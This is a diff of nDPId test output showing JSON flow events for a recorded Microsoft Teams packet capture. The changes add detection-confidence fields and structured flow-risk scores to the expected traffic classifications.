+00668{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1587041682355,"flow_last_seen":1587041682370,"flow_idle_time":180000,"flow_min_l4_payload_len":51,"flow_max_l4_payload_len":129,"flow_tot_l4_payload_len":180,"flow_avg_l4_payload_len":90,"midstream":0,"ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":65387,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Microsoft","breed":"Safe","category":"Web"}}
 00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":24,"flow_first_seen":1587041682076,"flow_last_seen":1587041682204,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":12188,"flow_avg_l4_payload_len":507,"midstream":0,"ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.75.70","src_port":60540,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00658{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"finished","flow_packets_processed":22,"flow_first_seen":1587041682077,"flow_last_seen":1587041682212,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":10552,"flow_avg_l4_payload_len":479,"midstream":0,"ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.75.69","src_port":60541,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"TLS.Skype_Teams","breed":"Acceptable","category":"VoIP"}}
-00707{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"finished","flow_packets_processed":107,"flow_first_seen":1587041682369,"flow_last_seen":1587041683086,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":86354,"flow_avg_l4_payload_len":807,"midstream":0,"ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.33","src_port":60543,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15":"TLS (probably) not carrying HTTPS"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"}}
-00654{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"finished","flow_packets_processed":38,"flow_first_seen":1587041682376,"flow_last_seen":1587041692106,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":9736,"flow_avg_l4_payload_len":256,"midstream":0,"ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.76.48","src_port":60544,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"}}
-00655{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"finished","flow_packets_processed":83,"flow_first_seen":1587041682698,"flow_last_seen":1587041691929,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":14416,"flow_avg_l4_payload_len":173,"midstream":0,"ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.58","src_port":60545,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"}}
-00655{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"finished","flow_packets_processed":35,"flow_first_seen":1587041683186,"flow_last_seen":1587041683511,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":10412,"flow_avg_l4_payload_len":297,"midstream":0,"ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.88.59","src_port":60547,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"}}
-00706{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"finished","flow_packets_processed":29,"flow_first_seen":1587041683333,"flow_last_seen":1587041683650,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":15546,"flow_avg_l4_payload_len":536,"midstream":0,"ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.33","src_port":60548,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15":"TLS (probably) not carrying HTTPS"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"}}
-00710{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"finished","flow_packets_processed":24,"flow_first_seen":1587041685106,"flow_last_seen":1587041685981,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":8860,"flow_avg_l4_payload_len":369,"midstream":0,"ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.15.45","src_port":60551,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15":"TLS (probably) not carrying HTTPS"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"}}
-00705{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"finished","flow_packets_processed":25,"flow_first_seen":1587041685232,"flow_last_seen":1587041685890,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":9605,"flow_avg_l4_payload_len":384,"midstream":0,"ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.33","src_port":60552,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15":"TLS (probably) not carrying HTTPS"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"}}
-00707{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"finished","flow_packets_processed":31,"flow_first_seen":1587041685248,"flow_last_seen":1587041688035,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":11696,"flow_avg_l4_payload_len":377,"midstream":0,"ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.33","src_port":60555,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15":"TLS (probably) not carrying HTTPS"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"}}
-00706{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"finished","flow_packets_processed":33,"flow_first_seen":1587041686239,"flow_last_seen":1587041686589,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":18814,"flow_avg_l4_payload_len":570,"midstream":0,"ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.33","src_port":60559,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15":"TLS (probably) not carrying HTTPS"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"}}
-00706{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"finished","flow_packets_processed":37,"flow_first_seen":1587041687245,"flow_last_seen":1587041688061,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":22353,"flow_avg_l4_payload_len":604,"midstream":0,"ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.33","src_port":60561,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15":"TLS (probably) not carrying HTTPS"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"}}
-00655{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"finished","flow_packets_processed":33,"flow_first_seen":1587041691149,"flow_last_seen":1587041691582,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":10149,"flow_avg_l4_payload_len":307,"midstream":0,"ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.108.8","src_port":60565,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"}}
+00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"finished","flow_packets_processed":22,"flow_first_seen":1587041682077,"flow_last_seen":1587041682212,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":10552,"flow_avg_l4_payload_len":479,"midstream":0,"ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.75.69","src_port":60541,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Skype_Teams","breed":"Acceptable","category":"VoIP"}}
+00813{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"finished","flow_packets_processed":107,"flow_first_seen":1587041682369,"flow_last_seen":1587041683086,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":86354,"flow_avg_l4_payload_len":807,"midstream":0,"ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.33","src_port":60543,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"}}
+00680{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"finished","flow_packets_processed":38,"flow_first_seen":1587041682376,"flow_last_seen":1587041692106,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":9736,"flow_avg_l4_payload_len":256,"midstream":0,"ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.76.48","src_port":60544,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"}}
+00681{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"finished","flow_packets_processed":83,"flow_first_seen":1587041682698,"flow_last_seen":1587041691929,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":14416,"flow_avg_l4_payload_len":173,"midstream":0,"ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.58","src_port":60545,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"}}
+00681{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"finished","flow_packets_processed":35,"flow_first_seen":1587041683186,"flow_last_seen":1587041683511,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":10412,"flow_avg_l4_payload_len":297,"midstream":0,"ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.88.59","src_port":60547,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"}}
+00812{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"finished","flow_packets_processed":29,"flow_first_seen":1587041683333,"flow_last_seen":1587041683650,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":15546,"flow_avg_l4_payload_len":536,"midstream":0,"ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.33","src_port":60548,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"}}
+00816{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"finished","flow_packets_processed":24,"flow_first_seen":1587041685106,"flow_last_seen":1587041685981,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":8860,"flow_avg_l4_payload_len":369,"midstream":0,"ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.15.45","src_port":60551,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"}}
+00811{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"finished","flow_packets_processed":25,"flow_first_seen":1587041685232,"flow_last_seen":1587041685890,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":9605,"flow_avg_l4_payload_len":384,"midstream":0,"ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.33","src_port":60552,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"}}
+00813{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"finished","flow_packets_processed":31,"flow_first_seen":1587041685248,"flow_last_seen":1587041688035,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":11696,"flow_avg_l4_payload_len":377,"midstream":0,"ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.33","src_port":60555,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"}}
+00812{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"finished","flow_packets_processed":33,"flow_first_seen":1587041686239,"flow_last_seen":1587041686589,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":18814,"flow_avg_l4_payload_len":570,"midstream":0,"ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.33","src_port":60559,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"}}
+00812{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"finished","flow_packets_processed":37,"flow_first_seen":1587041687245,"flow_last_seen":1587041688061,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":22353,"flow_avg_l4_payload_len":604,"midstream":0,"ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.33","src_port":60561,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"}}
+00681{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"finished","flow_packets_processed":33,"flow_first_seen":1587041691149,"flow_last_seen":1587041691582,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":10149,"flow_avg_l4_payload_len":307,"midstream":0,"ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.108.8","src_port":60565,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"}}
 00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":74,"flow_state":"info","flow_packets_processed":24,"flow_first_seen":1587041694219,"flow_last_seen":1587041695993,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":8320,"flow_avg_l4_payload_len":346,"midstream":0,"ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.136","src_port":60567,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00646{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":1587041672419,"flow_last_seen":1587041697427,"flow_idle_time":180000,"flow_min_l4_payload_len":279,"flow_max_l4_payload_len":279,"flow_tot_l4_payload_len":1674,"flow_avg_l4_payload_len":279,"midstream":0,"ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.0.1","dst_ip":"255.255.255.255","src_port":68,"dst_port":67,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DHCP","breed":"Acceptable","category":"Network"}}
-00653{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1587041679280,"flow_last_seen":1587041679280,"flow_idle_time":180000,"flow_min_l4_payload_len":485,"flow_max_l4_payload_len":485,"flow_tot_l4_payload_len":485,"flow_avg_l4_payload_len":485,"midstream":0,"ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"255.255.255.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}}
-00606{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1587041673094,"flow_last_seen":1587041677380,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"149.154.167.91","src_port":58533,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Telegram","breed":"Acceptable","category":"Chat"}}
+00672{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":1587041672419,"flow_last_seen":1587041697427,"flow_idle_time":180000,"flow_min_l4_payload_len":279,"flow_max_l4_payload_len":279,"flow_tot_l4_payload_len":1674,"flow_avg_l4_payload_len":279,"midstream":0,"ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.0.1","dst_ip":"255.255.255.255","src_port":68,"dst_port":67,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DHCP","breed":"Acceptable","category":"Network"}}
+00679{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1587041679280,"flow_last_seen":1587041679280,"flow_idle_time":180000,"flow_min_l4_payload_len":485,"flow_max_l4_payload_len":485,"flow_tot_l4_payload_len":485,"flow_avg_l4_payload_len":485,"midstream":0,"ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"255.255.255.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}}
+00640{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1587041673094,"flow_last_seen":1587041677380,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"149.154.167.91","src_port":58533,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Telegram","breed":"Acceptable","category":"Chat"}}
 00569{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1587041673094,"flow_last_seen":1587041677380,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"149.154.167.91","src_port":58533,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00662{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1587041684291,"flow_last_seen":1587041684304,"flow_idle_time":180000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":172,"flow_tot_l4_payload_len":210,"flow_avg_l4_payload_len":105,"midstream":0,"ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":59403,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNS.Microsoft365","breed":"Acceptable","category":"Collaborative"}}
-00668{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"finished","flow_packets_processed":54,"flow_first_seen":1587041684306,"flow_last_seen":1587041685465,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":14487,"flow_avg_l4_payload_len":268,"midstream":0,"ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"13.107.18.11","src_port":60549,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"TLS.Microsoft365","breed":"Acceptable","category":"Collaborative"}}
-00642{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1587041685243,"flow_last_seen":1587041685256,"flow_idle_time":180000,"flow_min_l4_payload_len":51,"flow_max_l4_payload_len":127,"flow_tot_l4_payload_len":178,"flow_avg_l4_payload_len":89,"midstream":0,"ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":51309,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"}}
+00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1587041684291,"flow_last_seen":1587041684304,"flow_idle_time":180000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":172,"flow_tot_l4_payload_len":210,"flow_avg_l4_payload_len":105,"midstream":0,"ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":59403,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Microsoft365","breed":"Acceptable","category":"Collaborative"}}
+00694{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"finished","flow_packets_processed":54,"flow_first_seen":1587041684306,"flow_last_seen":1587041685465,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":14487,"flow_avg_l4_payload_len":268,"midstream":0,"ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"13.107.18.11","src_port":60549,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Microsoft365","breed":"Acceptable","category":"Collaborative"}}
+00668{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2817,"source":"teams.pcap","alias":"nDPId-test","flow_id":44,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1587041685243,"flow_last_seen":1587041685256,"flow_idle_time":180000,"flow_min_l4_payload_len":51,"flow_max_l4_payload_len":127,"flow_tot_l4_payload_len":178,"flow_avg_l4_payload_len":89,"midstream":0,"ts_msec":1587041698021,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":51309,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}}
